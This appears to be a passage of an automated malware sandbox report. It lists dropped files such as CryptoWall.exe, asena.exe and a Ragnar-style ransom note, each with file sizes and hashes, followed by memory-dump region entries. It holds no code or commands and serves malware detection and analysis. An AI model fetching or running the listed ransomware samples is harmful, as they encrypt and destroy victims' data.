59c4081e8408a25726c5b2e659ff9d2333dcc693

SHA256
ebda356629ac21d9a8e704edc86c815770423ae9181ebbf8ca621c8ae341cbd5

SHA512
4153a095aa626b5531c21e33e2c4c14556892035a4a524a9b96354443e2909dcb41683646e6c1f70f1981ceb5e77f17f6e312436c687912784fcb960f9b050fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bomb.exe

Filesize
457KB

MD5
31f03a8fe7561da18d5a93fc3eb83b7d

SHA1
31b31af35e6eed00e98252e953e623324bd64dde

SHA256
2027197f05dac506b971b3bd2708996292e6ffad661affe9a0138f52368cc84d

SHA512
3ea7c13a0aa67c302943c6527856004f8d871fe146150096bc60855314f23eae6f507f8c941fd7e8c039980810929d4930fcf9c597857d195f8c93e3cc94c41d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBD68.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe

Filesize
132KB

MD5
919034c8efb9678f96b47a20fa6199f2

SHA1
747070c74d0400cffeb28fbea17b64297f14cfbd

SHA256
e036d68b8f8b7afc6c8b6252876e1e290f11a26d4ad18ac6f310662845b2c734

SHA512
745a81c50bbfd62234edb9788c83a22e0588c5d25c00881901923a02d7096c71ef5f0cd5b73f92ad974e5174de064b0c5ea8044509039aab14b2aed83735a7c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ngrok86.exe

Filesize
26.9MB

MD5
1e0a83fac6922bde341193e7085a6f33

SHA1
97dc81f5ae153951ed09ba30b106f31ee5054b00

SHA256
2295878561b60d1c5470bd23a4a49091620aad27dce4ad1ff63026d88a4c7944

SHA512
e4b2757b8940513a1fff35394ffd9a15acd40a3f4e5872a347cfd2da757d3a63adb48b73b22013794dd2192b06c507113e21183969d127b12e64576d89ce9b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe

Filesize
2.5MB

MD5
d07b3c00866cb1bba2cf2007161f84af

SHA1
f0215fdb9c97bd752489dd1601a4253494beafcb

SHA256
d2662051702168049d751c1b90cfef9f1e34a04a6c7689db3c79a2547a7339ba

SHA512
1d98b1d01e897caf715f877672cf256a25a3c3318af898df046cc011830376f558a65c0f5e308d0922f66634f24cced3999a7bb6cbffa9d8cd3091f27436f76f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\tt.exe

Filesize
88KB

MD5
ababca6d12d96e8dd2f1d7114b406fae

SHA1
dcd9798e83ec688aacb3de8911492a232cb41a32

SHA256
a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba

SHA512
b7fc70c176bdc74cf68b14e694f3e53142e64d39bd6d3e0f2e3a74ce3178ea606f92f760d21db69d72ae6677545a47c7bf390fb65cd5247a48e239f6ae8f7b8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBE55.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe

Filesize
159KB

MD5
6f8e78dd0f22b61244bb69827e0dbdc3

SHA1
1884d9fd265659b6bd66d980ca8b776b40365b87

SHA256
a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5

SHA512
5611a83616380f55e7b42bb0eef35d65bd43ca5f96bf77f343fc9700e7dfaa7dcf4f6ecbb2349ac9df6ab77edd1051b9b0f7a532859422302549f5b81004632d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FXA1YKNVRP9VGOVYAJXP.temp

Filesize
7KB

MD5
539654e1825b816bc03468073c566aab

SHA1
84c17f3d56ace5667564973e460f422791f3ab0e

SHA256
032061b65f895b7434d2727ff8a1d104c23768a994f38fbf5357178560beb069

SHA512
44335219ca961174b45abc53da4a970184c30ff402c004fcc455b0bac9c2f157eaa5bf2ca8ca33e702569a8ba70ca70846e2c25c9fcb0ee8eda80c3c0a92b22c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PCW0KML5KRWR9IT1UOZI.temp

Filesize
7KB

MD5
bbd57eae8003ff4f6e38edc43bec4f53

SHA1
bfda13a5a094847684f12b9e62ad73807927d2d7

SHA256
42255eeb28c6fb8ecb30d7fa9788c01b170952716aa7ac7cc41aefdbd2ab8727

SHA512
4907e7c2cb3974cfd66c4753e5d6d46908b081dc052017c5d6370e63f5503e8a4fbaf97760f9097b65d359094b408dc508ac6b8b859e742a5b3a559daa172cf3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBFPXI4IWE4VGQ1JHIX5.temp

Filesize
7KB

MD5
af4f206681926224c2baa2a0d47dad9b

SHA1
60522acac8d0ef8e3da8788833e5d311d04668e9

SHA256
91dad6ed14140d3c6286af9946ce7cb1a0e7eae865ae28affa545047271b7b0e

SHA512
c2f284cee964a7ce50d768763492c8751053a1a952fe5e252327192aa2ae51a01d19e7d6f6107dd314e9dde9ec19ae916cbe4b0edb5b7e21198ce144dc0b4289

Download Submit
C:\Users\Public\Documents\RGNR_2055E903.txt

Filesize
3KB

MD5
0880547340d1b849a7d4faaf04b6f905

SHA1
37fa5848977fd39df901be01c75b8f8320b46322

SHA256
84449f1e874b763619271a57bfb43bd06e9c728c6c6f51317c56e9e94e619b25

SHA512
9048a3d5ab7472c1daa1efe4a35d559fc069051a5eb4b8439c2ef25318b4de6a6c648a7db595e7ae76f215614333e3f06184eb18b2904aace0c723f8b9c35a91

Download Submit
C:\vcredist2010_x86.log.html.ragnar_2055E903

Filesize
81KB

MD5
3ee82c82f1f0568fe7ff86585d0442ad

SHA1
5ac68f31ff020d139ff337809266fd9cd868c942

SHA256
7704f9b760f3c39a39b60fa18e7388c1e70492ebe2b64b3ab823d6f1c1a148a9

SHA512
4c4679fb96df87f0dbdbf426a5cdae78cd9e25d660b5346f010723159cd863ad41f57853622b4cce28385ba499d861a26b63e97a546b4a459f413864012d39f9

Download Submit
\Users\Admin\AppData\Local\Temp\asena.exe

Filesize
39KB

MD5
7529e3c83618f5e3a4cc6dbf3a8534a6

SHA1
0f944504eebfca5466b6113853b0d83e38cf885a

SHA256
ec35c76ad2c8192f09c02eca1f263b406163470ca8438d054db7adcf5bfc0597

SHA512
7eef97937cc1e3afd3fca0618328a5b6ecb72123a199739f6b1b972dd90e01e07492eb26352ee00421d026c63af48973c014bdd76d95ea841eb2fefd613631cc

Download Submit
memory/224-939-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/228-1104-0x0000000000BB0000-0x0000000000BC0000-memory.dmp

Filesize
64KB

Download
memory/800-929-0x0000000000A80000-0x0000000000A90000-memory.dmp

Filesize
64KB

Download
memory/804-0-0x0000000074161000-0x0000000074162000-memory.dmp

Filesize
4KB

Download
memory/804-4969-0x0000000074160000-0x000000007470B000-memory.dmp

Filesize
5.7MB

Download
memory/804-1-0x0000000074160000-0x000000007470B000-memory.dmp

Filesize
5.7MB

Download
memory/804-2-0x0000000074160000-0x000000007470B000-memory.dmp

Filesize
5.7MB

Download
memory/804-20-0x0000000000A10000-0x0000000000A4D000-memory.dmp

Filesize
244KB

Download
memory/804-21-0x0000000000A10000-0x0000000000A4D000-memory.dmp

Filesize
244KB

Download
memory/924-798-0x0000000000DE0000-0x0000000000DF0000-memory.dmp

Filesize
64KB

Download
memory/1052-1063-0x0000000000070000-0x0000000000080000-memory.dmp

Filesize
64KB

Download
memory/1380-1109-0x0000000000CE0000-0x0000000000CF0000-memory.dmp

Filesize
64KB

Download
memory/1532-52-0x0000000000080000-0x00000000000A5000-memory.dmp

Filesize
148KB

Download
memory/1572-971-0x0000000001260000-0x0000000001270000-memory.dmp

Filesize
64KB

Download
memory/1624-1085-0x0000000000970000-0x0000000000980000-memory.dmp

Filesize
64KB

Download
memory/1744-1007-0x0000000000360000-0x0000000000370000-memory.dmp

Filesize
64KB

Download
memory/1824-1142-0x00000000008F0000-0x0000000000900000-memory.dmp

Filesize
64KB

Download
memory/1940-11296-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11252-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-8085-0x0000000000F20000-0x0000000001A44000-memory.dmp

Filesize
11.1MB

Download
memory/1940-11294-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11235-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11236-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11238-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11240-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11242-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11244-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11246-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11248-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11250-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-10178-0x0000000008730000-0x0000000008D64000-memory.dmp

Filesize
6.2MB

Download
memory/1940-11255-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11257-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11260-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11262-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11264-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11266-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11268-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11271-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11273-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11276-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11298-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11280-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11282-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11284-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11286-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11288-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11290-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-11292-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1940-10027-0x0000000006A90000-0x000000000710A000-memory.dmp

Filesize
6.5MB

Download
memory/1940-11124-0x00000000004B0000-0x00000000004CC000-memory.dmp

Filesize
112KB

Download
memory/1940-11278-0x00000000004B0000-0x00000000004C5000-memory.dmp

Filesize
84KB

Download
memory/1976-24-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2060-801-0x0000000001030000-0x0000000001040000-memory.dmp

Filesize
64KB

Download
memory/2176-886-0x0000000000E70000-0x0000000000E80000-memory.dmp

Filesize
64KB

Download
memory/2336-1032-0x00000000008F0000-0x0000000000900000-memory.dmp

Filesize
64KB

Download
memory/2384-823-0x00000000012E0000-0x00000000012F0000-memory.dmp

Filesize
64KB

Download
memory/2428-48-0x0000000000C90000-0x0000000000C98000-memory.dmp

Filesize
32KB

Download
memory/2492-795-0x0000000001110000-0x0000000001120000-memory.dmp

Filesize
64KB

Download
memory/2496-881-0x0000000000F60000-0x0000000000F70000-memory.dmp

Filesize
64KB

Download
memory/2520-1028-0x0000000000930000-0x0000000000940000-memory.dmp

Filesize
64KB

Download
memory/2608-1154-0x00000000012E0000-0x00000000012F0000-memory.dmp

Filesize
64KB

Download
memory/2708-941-0x0000000000BD0000-0x0000000000BE0000-memory.dmp

Filesize
64KB

Download
memory/2736-1069-0x0000000000AD0000-0x0000000000AE0000-memory.dmp

Filesize
64KB

Download
memory/2768-45-0x0000000000080000-0x00000000000A5000-memory.dmp

Filesize
148KB

Download
memory/2892-916-0x00000000013D0000-0x00000000013E0000-memory.dmp

Filesize
64KB

Download
memory/2912-49-0x0000000000090000-0x0000000000108000-memory.dmp

Filesize
480KB

Download
memory/2984-928-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

Filesize
64KB

Download
memory/3004-946-0x00000000013B0000-0x00000000013C0000-memory.dmp

Filesize
64KB

Download
memory/3048-810-0x00000000012D0000-0x00000000012E0000-memory.dmp

Filesize
64KB

Download
memory/3060-1064-0x0000000000BE0000-0x0000000000BF0000-memory.dmp

Filesize
64KB

Download
memory/3220-13315-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/4200-6458-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/4292-12229-0x000000001B820000-0x000000001BB02000-memory.dmp

Filesize
2.9MB

Download
memory/4292-12232-0x00000000026E0000-0x00000000026E8000-memory.dmp

Filesize
32KB

Download
memory/4368-6457-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/5348-11749-0x0000000000400000-0x0000000000B44000-memory.dmp

Filesize
7.3MB

Download
memory/5352-9322-0x0000000000600000-0x0000000000644000-memory.dmp

Filesize
272KB

Download
memory/5352-9295-0x0000000001D90000-0x0000000001DD6000-memory.dmp

Filesize
280KB

Download
memory/6008-7550-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/6008-7562-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/6212-10793-0x00000000001A0000-0x0000000000492000-memory.dmp

Filesize
2.9MB

Download
memory/6212-11748-0x0000000000800000-0x0000000000822000-memory.dmp

Filesize
136KB

Download
memory/6212-11157-0x0000000005190000-0x0000000005330000-memory.dmp

Filesize
1.6MB

Download
memory/6212-11172-0x0000000005700000-0x000000000589E000-memory.dmp

Filesize
1.6MB

Download